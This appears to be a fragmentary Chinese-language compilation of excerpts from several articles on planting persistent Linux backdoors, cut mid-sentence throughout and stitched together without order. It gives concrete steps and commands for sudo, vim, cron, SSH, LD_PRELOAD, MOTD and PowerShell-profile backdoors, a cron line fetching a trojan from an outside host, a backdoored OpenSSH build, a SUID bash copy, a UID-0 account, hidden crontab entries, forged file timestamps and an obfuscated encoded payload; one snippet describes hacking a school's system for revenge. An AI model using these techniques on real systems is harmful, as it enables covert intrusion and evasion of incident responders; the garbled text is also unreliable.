0x01 Linux 目录技巧 我们都知道 Windows 下文件和文件夹命名是有很多规则和限制的,但是可以通过一些程序来绕过限制,今天我们来看看 Linux 有哪些有趣的规则 参考 https:/...在 Linux 中 . 和 .. 目录是默认的,代表着本级和上级 ? 所以我们在创建 . 和 .. 的时候会提示文件夹已经存在了,所以我尝试了一下三个点,成功了 所以说 ....我们都知道 Windows 下文件和文件夹命名是有很多规则和限制的,但是可以通过一些程序来绕过限制,今天我们来看看 Linux 有哪些有趣的规则 参考 https://www.pathname.com...在 Linux 中 . 和 .. 目录是默认的目录,所以是无法创建为文件的,三个点就不受限制了 ? ? 创建几乎不受限制 ?...Linux万物皆文件
$(nohup vim -E -c "py3file demo.py"> /dev/null 2>&1 &) && sleep 2 && rm -f demo....
sudo 经常被用来将普通用户权限提升至 root 权限,代替 root 执行部分程序来管理 Linux 系统,这样避免 root 密码被泄漏 这篇文章介绍了三种利用其留后门的方法,其中也涉及一个sudo...有趣的特性,在极端条件下可能是系统的薄弱点;同时涉及一个没什么人关注的小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门 这篇文章以 Ubuntu Server...文件,在该文件中进行配置,让一个普通用户可以通过 sudo 获取 root 的权限 PS: 很多运维人员对于某个程序指定了一个配置文件夹,这个配置文件夹中是不是所有文件都会自动加载并不清楚,所以直接将后门配置写在...文件 + alias 劫持的方法来隐藏新建文件 有时候也没必要新建用户,可以尝试开启那些系统用户试试,或许有惊喜也说不定,但是这种操作一定要提前试一试 0x02 sudoedit 文件所有者后门 这个后门更偏向于一个概念性的后门...,可以通读整个配置文件来了解,这里我们只讨论 sudoers.so 文件 现在我们就来制作一个恶意的插件作为我们的后门 2) Metasploit 生成 payload 并监听 msfconsole -
次默认配置文件 /usr/share/vim 其中 $VIM 是 vim 内置的变量而不是 Linux 的环境变量,当然 vim 也是可以使用 Linux 环境变量的 通过在vim的底线命令模式中...,相信在以后还会对现在写的后门手法进行补充 0x04 vim 自身文件后门 这类后门比较简单粗暴,直接替换相关文件,暂时未发现 vim 存在自身使用的 .so 共享库文件,因此本章节以直接替换命令本身为例...制作后门文件 1) 下载源代码 在相同版本的 Linux 主机 B 上下载相同版本 vim 源代码 在主机B上编辑更新源,取消 deb-src 的注释 在主机 B 上下载 vim 源代码(可以指定版本.../usr/local/bin/vim 本地测试该文件后门代码是否有效 成功创建了有效的带有后门,且功能正常的 vim 3) 用后门vim替换 /usr/bin/vim 4) 模拟正常使用vim...触发后门 成功触发后门 5) 小结 几乎每一种后门都可以用这样的方法,技术含量不高,简单粗暴,但是偶尔也会被应急人员忽略 0x05 配置文件后门 前面用了将近 6 万字介绍了 vim 的配置相关内容
/etc/profile 【系统级】Linux是一个多用户操作系统。...把strace的输出单独写到指定的文件 /tmp/sshpwd-xxx.log ,这个没啥好说的 -e read,write,connect Linux内核目前有300多个系统调用,详细的列表可以通过...可以看到我们之前提交的数据,同时呢,这个文件返回的内容也比较多,只要改一个好点的名字可能会让安全管理人员认为是正常的文件 这种后门的场景就是用户登录到这台主机上后,使用这台主机的ssh去远程连接其他主机才能引发后门...后门 ?...修改后门文件的时间与同目录名称相似的文件的 MAC 时间相同 touch -acmr /etc/update-manager/release-upgrades /etc/update-manager/release-update
ssh 客户端配置文件加载顺序 命令行参数 > ~/.ssh/config > /etc/ssh/ssh_config Ubuntu server 16.04 默认 /etc/ssh/ssh_config...连接主机过程中设置代理所使用的命令 重复过程不再赘述,仅写标题 msf设置监听 创建 ~/.ssh/config 如果.ssh目录不存在就创建这个目录,可以直接将 /etc/ssh/ssh_config 复制过来 创建恶意脚本文件
Linux 计划任务是一项服务,由 cron 工具来完成,主要目的就是在无需人工干预的情况下运行作业 PS: 功能较为简单的at命令在Ubuntu 16.04中已经不自带了 0x01 cron服务简介...看起来像是一个文件,因为有注释有空格,那么究竟是不是一个文件呢?一会儿再说吧(Linux上万物皆文件,肯定是文件啦!).../* 每隔10分钟下载一下我们的木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用 首先介绍一下日志的问题,Ubuntu 16.04...0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab...这种利用方法巧妙在使用了windows中的 \r( Linux 中显示为M),导致显示截断,从而隐藏我们真实的计划任务,我们使用crontab -e 可以看到真实的计划任务如下: ?
0x00 前情提要 在 alias 后门 | Linux 后门系列一文中,我们为了让后门完美一些,修改了后门文件的 atime、mtime,但是 ctime 一直没有办法修改,今天我们来把这一块补齐,...让后门更加完美 atime -> access time, 访问时间 mtime -> modify time,修改时间 ctime -> change time, 状态变化时间 最新版 Linux 中多了一个属性...改变更新文件时间戳的应用运行状态 从字面意思看,我们可以找到维护Linux文件时间戳的应用,之后对应用本身进行修改,这听起来就是一个十分困难和危险的操作 简单一点,就是停止运行系统,通过较为底层的层面去修改目标文件的.../release-update /etc/update-manager/ 如果是需要执行的后门,现在执行并放置后台,如果像 alias 那种配置文件后门则不需要此章节 /etc/update-manager...(权限和所属方面要符合后门实际情况,不要造成修改后没有权限读取了) sudo chmod --reference=正常配置文件 恶意配置文件 sudo chown --reference=正常配置文件
可以看到可执行文件 hook.so 已经完成了 设置 LD_PRELOAD ? 成功获取到反弹shell ,劫持成功。...加固后门 正常大家检查是否存在 LD_PRELOAD 后门的时候都是直接 echo $LD_PRELOAD ?...成功劫持 export 没有设置后门时候是这样的 ? 设置后门后是这样的 ?...劫持成功 现在我们来进行验证后门还好用吗 ? 可以看到后门可以使用,那么现在我们来看一下以上各种方法还能否看见我们做的手脚 ? 完美!...Tips: 使用 readonly 命令设置的环境变量不可修改 在有SUID,SGID存在的文件是无视 LD_PRELOAD 的,无法用 :LD_PRELOAD 劫持 这些命令的源码 git clone
Linux - /opt/microsoft/powershell/7/profile.ps1 macOS - /usr/local/microsoft/powershell/7/profile.ps1...Linux - ~/.config/powershell/profile.ps1 macOS - ~/.config/powershell/profile.ps1 当前用户,当前主机 Windows -...Bash 配置文件一样,在其中放置后门程序 默认情况下都不存在这些文件 接下来进行试验 创建 C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1...在第一个后门文件中额外插入powershell 代码,将 I am a Backdoor 写入到桌面的 backdoor.txt 中 先是在 cmd 中进行测试 powershell ..../demo.ps1 删除 backdoor.txt 图形化右键执行 demo.ps1 也就是说这类后门对所有的 powershell 程序有效
,是Linux中发送问候消息的功能,一般在我们登录服务器后显示 每次任意用户登录时都会触发motd服务的功能,这个功能的脚本几乎都是使用root 权限来启动的,所以很适合用来做后门 实用部分 随着关注我们的朋友越来越多.../etc/update-motd.d/这个目录下 这些脚本动态的组合成了我们上面看到的那么 Banner 信息 这些文件只允许 root 用户编辑,所以使用此后门需要先获取root权限 留后门 这个目录下的所有文件在任意用户登录后都会执行一遍...,所以我们可以选择新建一个脚本或者修改其中的脚本来完成留后门的目的 以 00-header 文件为例 #!...MOTD 是一项服务 既然是一项服务,我们就可以查看这项服务的详细信息 结果发现 MOTD 服务的配置文件是空的,空的配置文件是无法启动一项服务的 但是刚才我们设置后门的时候明明是正常的,所以我猜测可能服务名字不叫...来加载配置文件呀,这完全可以作为一个单独的后门方式去讲,但这里已经讲了就不单独开章节了 我们在 Ubuntu 18.04 中简单搜索一下 粗略的计算有 196 个 这就是说这些文件中我们都可以塞进去一些恶意程序
备份原文件: 1、mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old 2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old...3、下载并安装ssh后门: 将sshdb.tgz后门程序放置到你自己的服务器的某目录下,并且改成为test.tgz,这里为www.test.com的根目录下 # wget http://www.test.com.../test.tgz # tar zxvf test.tgz # cd openssh 4、设置ssh后门的登录密码: vi includes.h define _SECRET_PASSWD "test1234..." -> #test1234位后门连接密码 5、编译安装: # ....prefix=/usr --sysconfdir=/etc/ssh # make && make install # cp ssh_config sshd_config /etc/ssh/ 修改文件时间
d在我们攻防当中,常常会碰到linux机器,拿到之后为了避免发现 低权限升高权限 创建一个c文件 #include int main() { setuid(0);
是一样的,在这里不过多描述了 ---- 在这里再添加一点之前遗漏的小东西 0x03 mknod [+] 之前创建命名管道都是用 mkfifo ,今天我发现了一个命令 mknod ,这个命令是用来创建一个文件块
注入式攻击”也就是可以向 bash注入一段命令,从bash1.14到4.3都存在这样的漏洞; 漏洞编号:CVE-2014-6271 详细情况:Bash(GNU Bourne-Again Shell)是大多数Linux...Bash其广泛的使用将意味全球至少 150 万的主机将受到影响,此外 Linux/Unix 世界内的安卓和苹果都难以幸免。
UnixBash 远控后门 简介 利用 Unix/Linux 自带的 Bash 和 Crond 实现远控功能,保持反弹上线到公网机器。...nc -vv -lp 53 Linux/Unix 藏文件和文件夹 Linux/Unix 下想藏 Webshell 或者后门什么的,可以利用一下隐藏文件夹和文件。 方法一 比如创建一个名字开头带 ....的文件夹 效果如图: Linux/Unix 添加 UID 为 0 的用户 简介 在 Unix 体系下,UID 为 0 就是 root 权限。...利用方法 useradd -o -u 0 backdoor Linux/Unix 修改文件时间戳 简介 Unix 下藏后门必须要修改时间,否则很容易被发现,直接利用touch就可以了。...劣势:需要编译环境,缺少GCC或其他依赖包容易出现问题 openssh后门 简介 下载新版本的openssh,并下载对应patch包,这个patch文件包含sshbd5.9p1.diff文件为后门文件,
在一个月黑风高的白天,忽然间发现我敬爱的母校的教务系统外网访问权限开放了,本着一个被学校荼毒了好几年的苦逼学生的报复性心理,我决定去教务系统搞搞事情,毕竟啥事儿...
在渗透过程中拿到目标权限只是开始,通常会留下后门以便再次访问(简称APT)。因此需要进行权限维持,隐藏后门。本文将对Linux下常见的权限维持后门技术进行解析,知己知彼百战不殆。...,故我们可以在root权限时留一个bash文件后门,使得在低权限时能够通过该后门获得root权限 cp /bin/bash /tmp/test chmod 4755 /tmp/test #或者chmod...(不通操作系统文件不同) 4.写入SSH公钥 原理:Linux主机打开了SSH时默认也开启了密钥登陆,故写入ssh公钥,即可留下一条控制系统的路 ssh-keygen -t rsa #生成ssh密钥对...,会加载相应的动态链接库,但linux提供了一个可以加载自定义动态链接库的方式,并且比加载正常动态链接库更早,故可以利用此特点设置自定义加载恶意动态链接库。.../vegile --u malware #malware为MSF的上线ELF文件 这个后门会生成多个恶意文件和进程 /usr/bin/screetsec /usr/bin/debug /usr/bin/
所以思路来了: 要保证我们后门的名字和模块的名字一样 我们的后门路径要优先被索引 最好名称能正常一点或者以 ....没想到 /usr/lib/python3.5/ 目录下还有一个跟这个文件名类似的文件,简直不要太好,我们看看文件内容,好决定怎么留后门,截取一小部分 ? ?...oQK9NnOnM3J7xCZoMWZ4VmCpkCZo4WZs1CboY3YlJnLz1zKklgC6wGPpQGKuVGbgUGbph2dKkCboY3YlJnLz1DZK0FMblSK0gidjVmcuMHLnkkPngyajFGcuVnL0NWdyR 这下好了,有六个部分,分别放在6个文件中进行存储后拼接成一个后门...没错,这个文件就在 /usr/lib/python3.5/plat-x86_64-linux-gnu/ 目录中,现在有两个选择 修改源文件 按照之前的方法,劫持它 这里选择修改源文件,加入 print(...plat-x86_64-linux-gnu/_sysconfigdata_m.py) 将代码弄到极度破碎,并且使用Python原声文件中的变量做payload的一部分,甚至可以把所有的函数都变形,回调等
领取专属 10元无门槛券
手把手带您无忧上云